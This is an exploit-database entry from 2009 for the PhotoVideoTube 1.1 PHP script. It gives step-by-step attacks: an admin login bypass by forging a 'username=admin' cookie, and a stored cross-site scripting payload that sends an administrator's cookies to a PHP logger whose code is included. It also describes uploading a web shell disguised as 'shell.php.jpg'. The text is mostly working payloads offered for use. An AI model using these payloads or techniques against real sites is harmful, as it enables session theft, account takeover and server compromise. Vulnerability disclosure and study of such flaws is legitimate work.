photovideotube 1.11 - Multiple Vulnerabilities

Author: Hakxer
type: webapps
platform: php
port: 
date_added: 2009-05-21  
date_updated:   
verified: 1  
codes: OSVDB-56264;OSVDB-56263;OSVDB-56262  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8776.txt  
  ___ ___         __
 /   |   \_____  |  | _____  ___ ___________
/    ~    \__  \ |  |/ /\  \/  // __ \_  __ \
\    Y    // __ \|    <  >    <\  ___/|  | \/
 \___|_  /(____  /__|_ \/__/\_ \\___  >__|
       \/      \/     \/      \/    \/   :: Egy Coders Team Researcher

/- PhotoVideoTube v 1.1 => Multiple Vulnerabilities
/- ( Insecure Cookie Handling & Cookie Grabber & Upload Shell )
/- http://photovideotube.com/
/- see demo script and executing vulnerabilities
/- Greetz : ExH , ProViDoR , Error Code , Bright D@rk , Sinaritx

* hi every body
* this script have a three vulnerabilities the first one
* cookie handling you can bypass control panel
* paste this js code
* javascript:document.cookie="username=admin";
* then go to http://host/path/admin/main.php
* now we are in a control panel

* ok second vulnerability Cookie Grabber
* first make file ( logger.php ) and paste this code in it
            <?php
            $cookie = $_GET['cookie'];
            $logger = fopen("logger.txt", "a");
            fwrite($logger, $cookie ."\n");
            fclose($logger);
            ?>
* and chmod file to 777
* now go to http://host/path/comment_pics.php?imgId=id
* and write this comment
* <script>document.location ="http://host/path/logger.php?cookie=" + document.cookie;</script>
* and click submit
* now if admin seen this picture cookie will sent to your logger.txt

* third vulnerability
* first make a account
* and go to upload photos http://host/path/upload_pics.php
* and upload shell like shell.php.jpg
* then show shell

* Be Safe

# milw0rm.com [2009-05-22]